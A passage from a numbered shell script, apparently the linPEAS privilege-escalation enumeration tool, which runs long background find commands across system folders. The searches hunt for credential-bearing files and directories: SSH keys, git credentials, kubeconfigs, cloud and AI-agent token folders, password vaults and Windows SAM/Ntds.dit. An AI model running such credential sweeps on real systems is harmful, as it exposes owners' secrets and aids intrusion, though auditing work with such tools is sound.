\"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    740 
    741   wait # Always wait at the end
    742   CONT_THREADS=0 #Reset the threads counter
    743 elif echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then
    744   printf $GREEN"Caching directories "$NC
    745   CONT_THREADS=0
    746   # FIND ALL KNOWN INTERESTING SOFTWARE FILES
    747   FIND_DIR_APPLICATIONS=`eval_bckgrd "find ${ROOT_FOLDER}applications -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    748   FIND_DIR_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    749   FIND_DIR_CACHE=`eval_bckgrd "find ${ROOT_FOLDER}.cache -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    750   FIND_DIR_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    751   FIND_DIR_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc -type d -name \"origin\" -o -name \".kube*\" -o -name \"k3s\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \"session.d\" -o -name \"containerd\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"crio\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"system-local.d\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"rke2\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"kube-proxy\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \"kubelet\" -o -name \"etcd\" -o -name \".cloudflared\" -o -name \"net.d\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \"pam.d\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"system.d\" -o -name \"doctl\" -o -name \"environments\" -o -name \"wpa_supplicant\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \"k0s\" -o -name \"system-connections\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"kubernetes\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    752   FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    753   FIND_DIR_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    754   FIND_DIR_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    755   FIND_DIR_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    756   FIND_DIR_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    757   FIND_DIR_RUN=`eval_bckgrd "find ${ROOT_FOLDER}run -type d -name \"kubernetes.io\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    758   FIND_DIR_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    759   FIND_DIR_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    760   FIND_DIR_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    761   FIND_DIR_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    762   FIND_DIR_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \"session.d\" -o -name \"services\" -o -name \"system-services\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    763   FIND_DIR_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -type d -name \"origin\" -o -name \".kube*\" -o -name \"k3s\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"microk8s\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \"containerd\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"crio\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"rke2\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"kube-proxy\" -o -name \"kubernetes.io\" -o -name \"sentry\" -o -name \"mysql\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"kubelet\" -o -name \"etcd\" -o -name \".cloudflared\" -o -name \"net.d\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \"k0s\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"kubernetes\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    764   FIND_DIR_CONCOURSE_AUTH=`eval_bckgrd "find ${ROOT_FOLDER}concourse-auth -type d -name \"concourse-auth\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    765   FIND_DIR_CONCOURSE_KEYS=`eval_bckgrd "find ${ROOT_FOLDER}concourse-keys -type d -name \"concourse-keys\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    766   FIND_APPLICATIONS=`eval_bckgrd "find ${ROOT_FOLDER}applications -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    767   FIND_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" 